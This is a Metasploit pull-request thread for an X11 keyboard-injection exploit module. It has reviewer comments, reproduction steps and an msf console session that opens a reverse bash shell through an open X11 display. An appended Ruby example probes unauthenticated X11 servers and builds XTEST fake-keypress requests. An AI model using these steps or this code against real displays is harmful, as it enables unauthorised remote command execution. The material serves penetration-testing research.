X11 Keyboard Exec #5692
Conversation
Maybe rename to X11 Keyboard Command Injection?
@hmoore-r7 Sounds fine to me! Let me know if you want me to change it, although I won't have time until next week for this.
release_key(KB_KEYS["f2"])

# Wait a second to open the dialog
select(nil, nil, nil, 1)
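Review bot: the wait in `select(nil, nil, nil, 1)` is a hard-coded one second, so on a host whose X server is slow to map the "Run Application" dialog the keystrokes that follow will be typed before it exists; take the delay from a datastore option (an OptInt registered in register_options, e.g. `TIME_WAIT`) and use that value instead of the literal 1, and since the select here is only being used as a sleep, `Rex.sleep(datastore['TIME_WAIT'])` reads more plainly than a nil-fd select.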
One second may be too slow for a host where the X services have been moved to (slow) swap. Making this configurable would be helpful.
@xistence Ping on this one as well, it seems pretty close to mergeable.
@hmoore-r7 I've added a TIME_WAIT option to wait for the GUI. The default is 5 seconds.
Thanks!
@xistence I haven't been able to get this to work; even on an open X11 display, all I get back is an error for each keypress. I have tried Kali 1.0 and Ubuntu 14.04. A wireshark of the traffic just shows mangled X11 replies.
It looks like the wire protocol is not correct; it doesn't match XSendEvent or XTEST in terms of format. I would suggest fixing this module to use XSendEvent (more widely compatible). I will PR some style/API changes back to your PR.
Style/API PR is at https://github.com/xistence/metasploit-framework/pull/5
@xistence I am going to close this for now, but we can reopen if you get time to work on this. Thanks!
This module connects to an open X11 server and registers as a virtual keyboard. After this, keystrokes are sent to "type" and execute a payload.
How to reproduce the easiest way (Tested on Kali linux):
On Kali run the following command to make the X11 socket available on all interfaces on port 6000:
socat -d -d TCP-LISTEN:6000,fork UNIX-CONNECT:/tmp/.X11-unix/X0
Make sure you are logged in on the X11 GUI of Kali.
Run the exploit (for extra fun, watch the commands getting typed in the Linux X11 GUI :))
msf > use exploit/unix/x11/x11_keyboard_exec
msf exploit(x11_keyboard_exec) > set RHOST 192.168.2.130
RHOST => 192.168.2.130
msf exploit(x11_keyboard_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf exploit(x11_keyboard_exec) > exploit
[*] Started reverse handler on 192.168.2.130:4444
[*] 192.168.2.130:6000 - Register keyboard
[*] 192.168.2.130:6000 - Opening "Run Application"
[*] 192.168.2.130:6000 - Opening xterm
[*] 192.168.2.130:6000 - Typing and executing payload
[*] Command shell session 78 opened (192.168.2.130:4444 -> 192.168.2.130:51523) at 2015-07-10 13:50:35 +0700
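As an added example (not code from this PR or from Metasploit), the Ruby below encodes the X11 connection-setup request a client such as this module must send first, parses the server's reply so an open display (Success) can be told apart from a rejection (Failed, the "No protocol specified" case) or an Authenticate challenge, and builds the XTEST FakeInput request for a single key press or release in the wire format the maintainer's comment refers to. Assumptions: little-endian byte order; the XTEST major opcode and the keycode are passed in as parameters because both must be learned from the server (QueryExtension and GetKeyboardMapping are not implemented here); the sample replies are constructed for illustration, not captured traffic; `x11_probe` is a hypothetical helper name.

```ruby
# Added example (not the module's or Metasploit's own code): minimal X11 wire-
# protocol helpers in plain Ruby, little-endian like the servers tested above.
require 'socket'

X11_MAJOR   = 11
X11_MINOR   = 0
KEY_PRESS   = 2   # X11 event type codes
KEY_RELEASE = 3

# Client connection-setup request (X11 protocol, "Connection Setup").
# Sent with no authorization data it is exactly the probe that only an
# unauthenticated ("open") display accepts.
def x11_setup_request(auth_name = '', auth_data = '')
  pad = ->(s) { s + ("\x00" * ((4 - s.bytesize % 4) % 4)) }
  ['l', 0, X11_MAJOR, X11_MINOR, auth_name.bytesize, auth_data.bytesize, 0]
    .pack('aCvvvvv') + pad.call(auth_name) + pad.call(auth_data)
end

# Parse the server's setup reply.  :status is :success, :failed or
# :authenticate; the other keys are the fields that status carries.
def x11_parse_setup_reply(buf)
  case buf.getbyte(0)
  when 0 # Failed: reason length, major, minor, extra length (4-byte units), reason
    reason_len, major, minor, _extra = buf.byteslice(1, 7).unpack('Cvvv')
    { status: :failed, major: major, minor: minor, reason: buf.byteslice(8, reason_len) }
  when 2 # Authenticate: 5 unused bytes, extra length (4-byte units), reason
    extra = buf.byteslice(6, 2).unpack1('v')
    { status: :authenticate, reason: buf.byteslice(8, extra * 4).delete("\x00") }
  when 1 # Success: fixed header, 4 unused bytes, vendor string, then formats/screens
    major, minor, _extra, release, id_base, id_mask, _motion, vendor_len, max_req,
      nscreens, _nformats, _img_order, _bit_order, _unit, _spad, min_kc, max_kc =
      buf.byteslice(2, 34).unpack('vvvVVVVvvCCCCCCCC')
    { status: :success, major: major, minor: minor, release: release,
      resource_id_base: id_base, resource_id_mask: id_mask, max_request_len: max_req,
      vendor: buf.byteslice(40, vendor_len), screens: nscreens,
      min_keycode: min_kc, max_keycode: max_kc }
  else
    { status: :unknown, code: buf.getbyte(0) }
  end
end

# Hypothetical helper: probe a display exposed on TCP (port 6000 + display
# number, e.g. via the socat line above).  :success means no auth was needed.
def x11_probe(host, display = 0, timeout = 5)
  sock = Socket.tcp(host, 6000 + display, connect_timeout: timeout)
  sock.write(x11_setup_request)
  head  = sock.read(8)
  extra = head.byteslice(6, 2).unpack1('v') * 4   # additional data, all statuses
  x11_parse_setup_reply(head + sock.read(extra))
ensure
  sock&.close
end

# XTEST FakeInput request (extension minor opcode 2) for one key event.
# The extension's major opcode differs per server and must come from a
# QueryExtension("XTEST") reply, so it is a parameter, not a constant;
# keycodes are server-specific too (GetKeyboardMapping), hence the raw keycode.
def xtest_fake_key(xtest_major_opcode, keycode, press)
  [xtest_major_opcode, 2, 9,                  # opcode, minor, length = 36 bytes / 4
   press ? KEY_PRESS : KEY_RELEASE, keycode,  # event type, detail (keycode)
   0, 0, 0].pack('CCvCCvVV') +                # pad, time (0 = CurrentTime), root (0)
    ("\x00" * 8) + [0, 0].pack('s<s<') +      # pad, rootX, rootY
    ("\x00" * 7) + [0].pack('C')              # pad, deviceid
end

# Constructed sample replies (illustrative values, not captured traffic).
SAMPLE_SUCCESS = [1, 0, 11, 0, 13, 12_000_000, 0x02000000, 0x001fffff, 256, 20, 65_535,
                  1, 7, 0, 0, 32, 32, 8, 255].pack('CCvvvVVVVvvCCCCCCCC') +
                 ("\x00" * 4) + 'The X.Org Foundation'
SAMPLE_FAILED  = [0, 21, 11, 0, 6].pack('CCvvv') + 'No protocol specified'.ljust(24, "\x00")

if __FILE__ == $PROGRAM_NAME
  p x11_parse_setup_reply(SAMPLE_SUCCESS)
  p x11_parse_setup_reply(SAMPLE_FAILED)
  p x11_probe(ARGV[0]) if ARGV[0]   # e.g. ruby x11_probe.rb 192.168.2.130
end
```

Run against the socat-exposed display from the steps above, a Success reply confirms the display accepts unauthenticated clients; a Failed reply with "No protocol specified" is what an xauth-protected server returns. Anything sent after the handshake has to be a well-formed request, which is why a garbled request stream shows up as the per-keypress errors described in the thread.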